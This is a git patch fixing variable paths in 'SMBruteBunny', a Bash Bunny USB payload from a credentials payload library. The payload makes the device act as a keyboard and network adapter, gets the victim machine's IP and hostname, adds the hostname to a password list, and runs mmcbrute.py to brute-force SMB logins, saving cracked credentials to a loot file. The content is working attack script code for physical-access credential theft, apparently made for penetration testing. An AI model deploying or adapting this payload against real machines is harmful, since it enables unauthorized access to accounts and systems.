From 3980bab638649148558000e46efffde67374f7a0 Mon Sep 17 00:00:00 2001 From: "Mohamed A. Baset" Date: Sat, 1 Jun 2019 02:22:45 -0500 Subject: [PATCH] Critical fixes I really missed the BB's original variable "$SWITCH_POSITION" since in my testing BB's payload I'm maintaining it in my code as: ORIGINAL_SWITCH="/root/udisk/payloads/$SWITCH_POSITION" Thanks to @catatonicprime for offering the fix for this issue. --- .../library/credentials/SMBruteBunny/payload.txt | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/payloads/library/credentials/SMBruteBunny/payload.txt b/payloads/library/credentials/SMBruteBunny/payload.txt index 4a1c9010..39489bb7 100644 --- a/payloads/library/credentials/SMBruteBunny/payload.txt +++ b/payloads/library/credentials/SMBruteBunny/payload.txt @@ -4,16 +4,18 @@ # Author: Mohamed A. Baset (@SymbianSyMoh) # PS: This is the shittiest bash script you'll ever see :D -password_process_file="$ORIGINAL_SWITCH/ppf.txt" -password_loot_file="$ORIGINAL_SWITCH/credentials.txt" -user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt" -pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt" - # Setup LED SETUP CUCUMBER PLAID -ATTACKMODE HID RNDIS_ETHERNET mount /dev/nandf /root/udisk/ +GET SWITCH_POSITION +BBSWITCH="/root/udisk/payloads/$SWITCH_POSITION" +password_process_file="$BBSWITCH/ppf.txt" +password_loot_file="$BBSWITCH/credentials.txt" +user_bruteforce_list="$BBSWITCH/userlist.txt" +pass_bruteforce_list="$BBSWITCH/passlist.txt" +mmcbrute_path="$BBSWITCH/mmcbrute" +ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET TARGET_HOSTNAME @@ -23,7 +25,7 @@ echo $TARGET_HOSTNAME >> $pass_bruteforce_list # Perform SMB bruteforce attack LED STAGE1 -python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file +python $mmcbrute_path/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file # Check for results LED STAGE2